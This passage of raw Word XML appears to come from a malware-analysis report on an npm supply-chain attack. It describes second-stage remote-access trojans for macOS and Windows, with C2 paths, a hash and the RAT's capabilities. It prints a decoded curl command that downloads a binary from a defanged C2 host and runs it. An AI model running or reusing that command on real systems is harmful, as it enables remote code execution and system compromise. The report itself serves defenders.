              </w:rPr>
              <w:t>packages.npm.org/product0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA49" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1979" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA47" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFA48" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>packages.npm.org/product1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFA4C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="197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4A" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Linux/Other</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="495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4B" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>packages.npm.org/product2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="278CFA4D" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="280" w:after="140"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Second-Stage RAT: macOS (Darwin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA4E" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>setup.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> writes an AppleScript to a temp location, executes it via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>nohup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>osascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, which POSTs to the C2, downloads a native binary to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>/Library/Caches/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>com.apple.act.mond</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (masquerading as a legitimate Apple component), applies </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 770</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, and launches it via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>zsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the background. The AppleScript is removed afterward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA4F"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Observed macOS command (decoded):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA50"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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c 'curl -o /Library/Caches/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>com.apple.act.mond</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -d packages.npm.org/product0 -s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA51"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 xml:space="preserve">hxxp://sfrclak[.]com:8000/6202033 &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 770 /Library/Caches/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>com.apple.act.mond</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA52"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/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>zsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -c "/Library/Caches/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>com.apple.act.mond</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> hxxp://sfrclak[.]com:8000/6202033 &amp;" &amp;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA53"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spacing w:after="283"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/dev/null'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA54" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> SHA-256:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA55" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="280" w:after="140"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Second-Stage RAT: Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA56" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The chain locates PowerShell via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve">where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> copies it to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>%PROGRAMDATA%\wt.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (masquerading as Windows Terminal), writes a VBScript stager to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>%TEMP%\6202033.vbs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, and executes it via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>cscript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>nologo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> for hidden execution. The VBScript launches hidden </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> to POST to the C2, saves the response as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>%TEMP%\6202033.ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, and executes it with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and hidden window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA57" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">On first execution, the PowerShell RAT: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA58" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Creates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>%PROGRAMDATA%\system.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA59" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Establishes reboot persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> by adding a registry run key at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA5A" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Generates a unique host identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA5B" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Collects detailed system inventory (OS version, boot time, installed hardware, running processes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA5C" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Communicates with the C2 via periodic, encoded HTTP POST requests that blend with benign traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA5D" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Supports commands for: arbitrary PowerShell execution, file/directory enumeration, in-memory binary payload injection, and self-termination</w:t>
      </w:r>
    </w:p>
